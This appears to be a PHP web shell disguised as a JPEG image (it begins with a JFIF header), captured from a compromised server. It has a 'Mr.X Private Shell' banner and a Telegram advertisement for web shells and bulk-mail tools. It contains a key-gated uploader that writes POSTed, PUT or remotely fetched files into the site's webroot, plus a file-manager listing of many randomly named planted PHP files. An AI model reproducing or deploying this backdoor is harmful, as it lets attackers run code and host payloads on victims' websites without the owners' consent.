����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

njujpgyl@216.73.217.55: ~ $
<?php
// CONFIG
$AUTH_KEY = 'madtiger';
$MAX_FILE_SIZE = 50 * 1024 * 1024; // 50 MB
$WEBROOT = rtrim($_SERVER['DOCUMENT_ROOT'] ?? __DIR__, "/\\");

// Generate random folder name with user-defined prefix
$FOLDER_PREFIX = isset($_GET['folder_prefix']) ? $_GET['folder_prefix'] : 'tmp_';
$RANDOM_FOLDER = $FOLDER_PREFIX . bin2hex(random_bytes(8));
$UPLOAD_DIR = $WEBROOT . '/' . $RANDOM_FOLDER;

// AUTH
if (!isset($_GET['prm']) || $_GET['prm'] !== $AUTH_KEY) {
    http_response_code(403);
    header('Content-Type: text/plain; charset=utf-8');
    echo "403 Forbidden\n";
    exit;
}

// Ensure upload directory exists
if (!is_dir($UPLOAD_DIR)) {
    if (!mkdir($UPLOAD_DIR, 0755, true)) {
        http_response_code(500);
        die("Failed to create upload directory\n");
    }
}

// Helper functions
function safe_filename($name) {
    $base = basename($name);
    $base = preg_replace('/[^A-Za-z0-9_\-\.]/', '_', $base);
    if ($base === '' || $base === '.' || $base === '..') $base = 'file';
    return $base;
}

function random_prefix($length = 4) {
    return str_pad(strval(random_int(0, pow(10, $length) - 1)), $length, '0', STR_PAD_LEFT);
}

function build_url($filename) {
    global $RANDOM_FOLDER;
    $scheme = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http';
    $host = $_SERVER['HTTP_HOST'] ?? 'localhost';
    return $scheme . '://' . $host . '/' . $RANDOM_FOLDER . '/' . rawurlencode($filename);
}

// Process uploads
$uploaded = null;
$error = null;

// 1) multipart POST (main method for Python script)
if (isset($_FILES['file'])) {
    $f = $_FILES['file'];
    if ($f['error'] !== UPLOAD_ERR_OK) {
        $error = "Upload error code: " . $f['error'];
    } elseif ($f['size'] > $MAX_FILE_SIZE) {
        $error = "File too large";
    } else {
        $safe = safe_filename($f['name']);
        $uniq = random_prefix(4) . '_' . $safe;
        $target = $UPLOAD_DIR . DIRECTORY_SEPARATOR . $uniq;

        if (!move_uploaded_file($f['tmp_name'], $target)) {
            $error = "Failed to move uploaded file";
        } else {
            chmod($target, 0644);
            $uploaded = [
                'filename' => $uniq,
                'size' => $f['size'],
                'path_on_server' => $target,
                'url' => build_url($uniq),
                'folder' => $RANDOM_FOLDER,
                'server' => $_SERVER['HTTP_HOST'] ?? 'unknown'
            ];
        }
    }
}

// 2) HTTP PUT with ?fname= (alternative method)
elseif ($_SERVER['REQUEST_METHOD'] === 'PUT' && isset($_GET['fname'])) {
    $fname = safe_filename($_GET['fname']);
    $putdata = fopen("php://input","r");
    $tmpPath = tempnam(sys_get_temp_dir(), "upl_");
    $out = fopen($tmpPath, "w");
    $bytes = 0;
    while (!feof($putdata)) {
        $chunk = fread($putdata, 8192);
        if ($chunk === false) break;
        $bytes += fwrite($out, $chunk);
    }
    fclose($putdata);
    fclose($out);
    if ($bytes === 0) {
        @unlink($tmpPath);
        $error = "No data received in PUT";
    } elseif ($bytes > $MAX_FILE_SIZE) {
        @unlink($tmpPath);
        $error = "File too large";
    } else {
        $uniq = random_prefix(4) . '_' . $fname;
        $target = $UPLOAD_DIR . DIRECTORY_SEPARATOR . $uniq;
        if (!rename($tmpPath, $target)) {
            @unlink($tmpPath);
            $error = "Failed to save uploaded file";
        } else {
            chmod($target, 0644);
            $uploaded = [
                'filename' => $uniq,
                'size' => $bytes,
                'path_on_server' => $target,
                'url' => build_url($uniq),
                'folder' => $RANDOM_FOLDER,
                'server' => $_SERVER['HTTP_HOST'] ?? 'unknown'
            ];
        }
    }
}

// 3) server-side fetch via get_url= (alternative method)
elseif (isset($_GET['get_url'])) {
    $remote = $_GET['get_url'];
    if (!preg_match('#^https?://#i', $remote)) {
        $error = "Invalid get_url (must be http/https)";
    } else {
        $ctx = stream_context_create(['http'=>['timeout'=>15]]);
        $data = @file_get_contents($remote, false, $ctx);
        if ($data === false) $error = "Failed to fetch remote URL";
        else {
            $size = strlen($data);
            if ($size > $MAX_FILE_SIZE) $error = "Remote file too large";
            else {
                $p = parse_url($remote);
                $name = isset($p['path']) ? basename($p['path']) : 'file';
                $safe = safe_filename($name);
                $uniq = random_prefix(4) . '_' . $safe;
                $target = $UPLOAD_DIR . DIRECTORY_SEPARATOR . $uniq;
                if (file_put_contents($target, $data) === false) {
                    $error = "Failed to save fetched file";
                } else {
                    chmod($target, 0644);
                    $uploaded = [
                        'filename' => $uniq,
                        'size' => $size,
                        'path_on_server' => $target,
                        'url' => build_url($uniq),
                        'folder' => $RANDOM_FOLDER,
                        'server' => $_SERVER['HTTP_HOST'] ?? 'unknown'
                    ];
                }
            }
        }
    }
} else {
    $error = "No file uploaded. Use multipart POST (-F), HTTP PUT (--upload-file &fname=), or get_url= for server fetch.";
}

// Output result
$plain = isset($_REQUEST['plain']) && ($_REQUEST['plain'] == '1' || strtolower($_REQUEST['plain']) === 'true');

if ($uploaded !== null) {
    if ($plain) {
        header('Content-Type: text/plain; charset=utf-8');
        echo $uploaded['url'] . "\n";
        exit;
    } else {
        header('Content-Type: application/json; charset=utf-8');
        echo json_encode(array_merge(['status'=>'ok'], $uploaded), JSON_UNESCAPED_SLASHES|JSON_PRETTY_PRINT);
        exit;
    }
} else {
    if ($plain) {
        header('Content-Type: text/plain; charset=utf-8');
        echo "ERROR: " . ($error ?? 'unknown') . "\n";
        exit;
    } else {
        http_response_code(400);
        header('Content-Type: application/json; charset=utf-8');
        echo json_encode(['status'=>'error','message'=>($error ?? 'unknown')], JSON_PRETTY_PRINT);
        exit;
    }
}
?>

Filemanager

Name Type Size Permission Actions
oxnixcgiapi Folder 0755
php_sessions Folder 0700
.cf4df8b5388b153770c7e6d2dda84a42.flag File 10 B 0644
.crontab.lock File 0 B 0644
File 0 B 0
File 0 B 0
16e2277f8b31_C File 0 B 0644
____ShEPAo File 12.25 KB 0600
____nl1y0N File 12.25 KB 0600
____rrQf0M File 12.25 KB 0600
File 0 B 0777
p6a46954ce0f325.75369525.php File 6.12 KB 0644
p6a46954d516b94.29488968.php File 6.12 KB 0644
p6a46954daf2e45.94546111.php File 6.12 KB 0644
p6a46954f930cb6.85712841.php File 6.12 KB 0644
p6a46954f941ba0.63784606.php File 6.12 KB 0644
p6a46954fcfe439.56290175.php File 6.12 KB 0644
p6a46954fd12325.05317177.php File 6.12 KB 0644
p6a46955040d765.42657365.php File 6.12 KB 0644
p6a4695507bf9e8.71352856.php File 6.12 KB 0644
p6a469550b1cc08.25594163.php File 6.12 KB 0644
p6a469550cf7457.14171334.php File 6.12 KB 0644
p6a469550cf7952.17934843.php File 6.12 KB 0644
p6a469551c3c674.61154397.php File 6.12 KB 0644
p6a469552482d78.96210947.php File 6.12 KB 0644
p6a469558bf6345.46602247.php File 6.12 KB 0644
p6a469558e689b2.91906263.php File 6.12 KB 0644
p6a46959c954807.31612744.php File 70.78 KB 0644
p6a4695a65bde91.60646262.php File 70.78 KB 0644
p6a4695ae4702b0.68400982.php File 70.78 KB 0644
p6a4695b4b14e45.16132778.php File 70.78 KB 0644
p6a4695bba3dff5.45441743.php File 70.78 KB 0644
p6a4695c22ff5d0.28795472.php File 70.78 KB 0644
p6a4695c7e06c84.82633204.php File 70.78 KB 0644
p6a4695cec11ee7.48318236.php File 70.78 KB 0644
p6a4695d6153002.53991012.php File 70.78 KB 0644
p6a469ba26dcac4.78964358.php File 70.78 KB 0644
p6a46a3960b5a70.95761662.php File 70.78 KB 0644
p6a46a3c7198985.10581212.php File 70.78 KB 0644
p6a46b4142eba65.65855734.php File 70.78 KB 0644
p6a46dcbe32de49.63968430.php File 70.78 KB 0644
p6a46fe0bce9188.73985126.php File 70.78 KB 0644
p6a46fef7d0d7a5.49283456.php File 70.78 KB 0644
p6a46ff1e6ba184.69333131.php File 70.78 KB 0644
p6a47063abab6c6.05284004.php File 70.78 KB 0644
p6a470646acfa44.04273048.php File 70.78 KB 0644
p6a4724fa89ac78.37722989.php File 70.78 KB 0644
p6a4752df7f96b2.91154102.php File 70.78 KB 0644
p6a4756ee3f34c2.33880229.php File 70.78 KB 0644
p6a475740e88166.16013609.php File 70.78 KB 0644
p6a4767a087c105.51581540.php File 70.78 KB 0644
p6a47bae1e95417.68680202.php File 70.78 KB 0644
p6a47bafaba1691.48053278.php File 70.78 KB 0644
p6a47bb01417b44.04639345.php File 70.78 KB 0644
p6a47bb29447bd3.37048310.php File 70.78 KB 0644
p6a47dc878aa148.92541801.php File 70.78 KB 0644
p6a48023ca3a5c8.44655047.php File 70.78 KB 0644
perl6a475e83735b85513 File 878 B 0644
phpRu8z5O File 991 B 0600
phpSuvwQh File 1008 B 0600
phpVr7KRy File 991 B 0600
phpetLxmq File 991 B 0600
phpkQA3ov File 991 B 0600
sess_0143c1e8e97da861c623ff508a441c54.php File 462.7 KB 0644
tmp.LvhCIRN84R File 0 B 0600
tmp.MKghhfNiKX File 0 B 0600
tmp.gILkwIktHU File 0 B 0600
update_cf4df8b5388b153770c7e6d2dda84a42.php File 8.46 KB 0644
www.delhigal.com.588275.tmp File 34.55 KB 0644